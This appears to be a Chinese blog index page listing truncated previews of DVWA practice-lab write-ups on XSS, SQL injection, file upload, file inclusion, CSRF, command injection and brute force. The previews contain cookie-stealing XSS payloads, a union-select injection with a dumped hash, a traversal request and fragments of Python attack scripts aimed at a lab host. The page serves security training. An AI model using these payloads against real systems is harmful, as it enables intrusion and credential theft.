- 博客(9)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 DVWA - XSS (Stored) (low, medium, high)
low无验证,Massage直接注入<script>alert(document.cookie)</script>medium查看源码发现Name只过滤了<scrpit>标签$name = str_replace( '<script>', '', $name ); 绕过思路:HTML页面修改Name的最大输入长度,注入Name,注入script大写<input name="txtName" typ
2017-01-06 17:33:14
2833
原创 DVWA - XSS (Reflected) (low, medium, high)
low无验证,直接注入<script>alert(document.cookie)</script>medium查看源码发现过滤了<scrpit>标签$name = str_replace( '<script>', '', $_GET[ 'name' ] ); 绕过思路:大写<Script>alert(document.cookie)</script>high查看源码,可发现用正则过滤了$name
2017-01-06 17:18:52
1784
原创 DVWA - SQL Injection (Blind) (low)
low从数据库名到所有记录,用二分写了一遍。import requestsimport urllibimport jsonclass SqlHacker(object): """docstring for SqlHacker""" def __init__(self, post=False, inject_point_number=False): super(Sql
2017-01-06 17:02:41
930
原创 DVWA - SQL Injection (low, medium, high)
low查看源码,可发现是注入点id为字符类型,无验证,直接上:' union select first_name, password from users#返回结果如下:ID: ' union select first_name, password from users#First name: adminSurname: e2075474294983e013ee4dd2201c7a73ID:
2017-01-06 16:50:25
2678
原创 DVWA - File Upload (low, medium, high)
low这个等级直接上传shellimport requestsimport redef main(): headers = { 'Cookie': 'PHPSESSID=jb7d875vs8rlusttoadfi1m4l5; security=low' } url = 'http://192.168.67.22/dvwa/vulnerabilities/up
2017-01-06 16:21:48
2744
原创 DVWA - File Inclusion (low, medium, high)
low观察URL可发现,注入点在page,low等级直接注入http://192.168.67.22/dvwa/vulnerabilities/fi/?page=/etc/profile返回结果如下:# /etc/profile: system-wide .profile file for the Bourne shell (sh(1)) # and Bourne compatible shells
2017-01-06 14:30:34
1109
原创 DVWA - CSRF (low, medium, high)
low设置一下cookie的PHPSESSID和security即可跨站请求import requestsdef main(): url = 'http://192.168.67.22/dvwa/vulnerabilities/csrf/index.php' headers = { 'Cookie': 'PHPSESSID=88airjn39jqo5mi25fnngk
2017-01-06 14:12:31
3433
1
原创 DVWA - Command Injection (low, medium, high)
low查看源码// Get input$target = $_REQUEST[ 'ip' ];// Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Windows NT' ) ) { // Windows $cmd = shell_exec( 'ping ' . $targ
2017-01-05 22:24:50
1130
原创 DVWA - Brute Force (low, medium, high)
low遍历字典(成功的前提是字典里有这个密码)import requestsimport redef main(): url = 'http://192.168.67.22/dvwa/vulnerabilities/brute/index.php' headers = { 'Cookie': 'PHPSESSID=h6r8555q2obvo388r4u50lg39
2017-01-05 22:08:01
1711
LA - 3135 - Argus.cpp
2013-01-03
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人